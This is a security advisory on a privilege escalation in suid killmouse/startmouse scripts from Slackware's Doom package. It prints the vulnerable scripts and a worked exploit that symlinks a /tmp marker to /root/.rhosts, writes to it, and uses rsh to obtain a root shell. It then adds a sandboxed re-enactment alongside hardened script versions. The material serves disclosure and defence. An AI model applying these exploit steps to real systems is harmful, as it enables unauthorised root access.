System:     Probably Linux specific. Slackware 3.0 systems (which install
            Linux 1.2.13) that have the gpm utility and/or the Doom package
            installed are vulnerable. Other distributions might be too.

Impact:     Local users can acquire root status.

Background: The problem is the killmouse/startmouse command that is part of
            the Doom package on Linux systems. It is actually a C wrapper
            that runs two scripts (killmouse.sh/startmouse.sh). It runs
            suid root.

/usr/games/doom/startmouse.sh:

    #!/bin/sh
    if [ -r /tmp/gpmkilled ]; then
        /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
        /bin/sh /tmp/gpmscript;
        /bin/rm /tmp/gpmscript /tmp/gpmkilled
    fi

/usr/games/doom/killmouse.sh:

    #!/bin/sh
    if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
        GPM_RUNNING=true;
        /bin/killall gpm;
        /bin/touch /tmp/gpmkilled
    fi

Problem:    I would try to describe the problem but I can't stop laughing.

Exploit:    This can be exploited in a few similar ways. Here's just one.

Let's assume the gpm utility is not running. We can't start it up ourselves,
as gpm is only to be run by root. So we'll use startmouse to fire it up:

    $ touch /tmp/gpmkilled
    $ /usr/games/doom/startmouse
    $ ps -aux | grep gpm
    bo        1436  0.0  2.0    40  312  v03 R  16:33   0:00 grep gpm
    root      1407  0.0  2.4    42  368   ?  S  16:24   0:00 /usr/bin/gpm t ms

Fine, it's running. Now we'll use killmouse to kill the process, but first
we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts. killmouse.sh
touches /tmp/gpmkilled as root: touch follows the symlink, and the suid
wrapper inherits our umask, so the file it creates is world-writable:

    $ umask 0
    $ ln -s /root/.rhosts /tmp/gpmkilled
    $ /usr/games/doom/killmouse
     1407  ?  S     0:00 gpm t ms
    $ ls -l /root/.rhosts
    -rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts
    $ echo localhost bo > /root/.rhosts
    $ rsh -l root localhost sh -i
    bash#

Bingo.

On some systems gpm might not be started in /etc/rc.d/rc.local, so the
startmouse script will fail. But gpm might be running already. If neither of
these conditions is met, note that startmouse.sh creates /tmp/gpmscript and
runs it in a shell. There's a window of time between creating the script and
executing it, so we have a nice race condition here; the file can be replaced
with anything you like prior to execution.

Solution:   Remove the setuid bits of killmouse/startmouse. Better yet - nuke
            them. While you're at it, nuke Doom too - it's a stupid game
            anyway :-)
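Added example, not from the advisory or the Doom package: a sandboxed sh
re-enactment of the two flaws above (killmouse.sh touching a fixed name in
/tmp with the caller's umask, and startmouse.sh writing a fixed-name script
to /tmp before running it) next to a hardened version of both scripts. Every
path is a constructed stand-in inside a temp directory, the rc.local is a
constructed fake, and the /var/run/doom state directory is an assumption
about where such a marker would belong; it runs as an ordinary user and
touches nothing outside the sandbox.

```shell
#!/bin/sh
# Added example (not from the advisory): a sandboxed re-enactment of the
# /tmp/gpmkilled symlink problem and a hardened version of the same two
# scripts. Every path below is a constructed stand-in inside a temp dir;
# nothing needs root and nothing outside the sandbox is touched.

SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT
TMP="$SANDBOX/tmp"            # stand-in for world-writable /tmp
ROOTHOME="$SANDBOX/root"      # stand-in for /root
RCLOCAL="$SANDBOX/rc.local"   # constructed stand-in for /etc/rc.d/rc.local
STATEDIR="$SANDBOX/run/doom"  # assumed root-owned /var/run/doom equivalent
mkdir -p "$TMP" "$ROOTHOME"
printf '%s\n' '# constructed rc.local' 'echo "starting gpm"' > "$RCLOCAL"

perm_of() { ls -ld "$1" | cut -c1-10; }   # e.g. -rw-rw-rw-

# ---- vulnerable pattern: fixed name in /tmp, umask inherited from caller
# killmouse.sh runs `/bin/touch /tmp/gpmkilled` as root. touch follows
# symlinks, and the suid wrapper keeps the umask of whoever invoked it.
vulnerable_killmouse() {      # $1 = umask the invoking user set
    ( umask "$1"; touch "$TMP/gpmkilled" )
}

# startmouse.sh writes a script to a fixed /tmp name and then runs it;
# between the redirect and the `sh` anyone can swap the file's contents.
vulnerable_startmouse() {
    [ -r "$TMP/gpmkilled" ] || return 0
    grep gpm "$RCLOCAL" > "$TMP/gpmscript"
    sh "$TMP/gpmscript"
    rm -f "$TMP/gpmscript" "$TMP/gpmkilled"
}

# What the local user does: put a symlink where root's touch will land.
attacker_plant_symlink() {
    rm -f "$TMP/gpmkilled"
    ln -s "$ROOTHOME/.rhosts" "$TMP/gpmkilled"
}

# ---- hardened pattern: private state dir, forced umask, no script file
# The marker lives in a directory the privileged script creates itself.
# mkdir never follows symlinks and fails if anything already sits at the
# path, and a pre-existing symlink is rejected rather than descended into.
safe_killmouse() {
    mkdir -p "$(dirname "$STATEDIR")"
    mkdir -m 0700 "$STATEDIR" 2>/dev/null || true
    if [ -L "$STATEDIR" ] || ! [ -d "$STATEDIR" ]; then
        echo "refusing: $STATEDIR is not a directory we created" >&2
        return 1
    fi
    ( umask 077; : > "$STATEDIR/gpmkilled" )   # 0600 regardless of caller
}

# The rc.local snippet is piped straight into sh: no file, no race window.
safe_startmouse() {
    [ -e "$STATEDIR/gpmkilled" ] || return 0
    grep gpm "$RCLOCAL" | sh
    rm -f "$STATEDIR/gpmkilled"
}

# Stand-alone run: show both outcomes.
attacker_plant_symlink
vulnerable_killmouse 0
echo "vulnerable: $(perm_of "$ROOTHOME/.rhosts") (root's .rhosts, via symlink)"
rm -f "$ROOTHOME/.rhosts"
safe_killmouse
echo "hardened:   $(perm_of "$STATEDIR/gpmkilled") (marker in private dir)"
```

The hardened version is only sound when the parent of the state directory
is not writable by unprivileged users (as /var/run is); a "private" directory
under /tmp would still need a randomised name and an ownership check after
mkdir. Piping the rc.local lines into sh removes the race entirely because
there is no longer a file for anyone to replace.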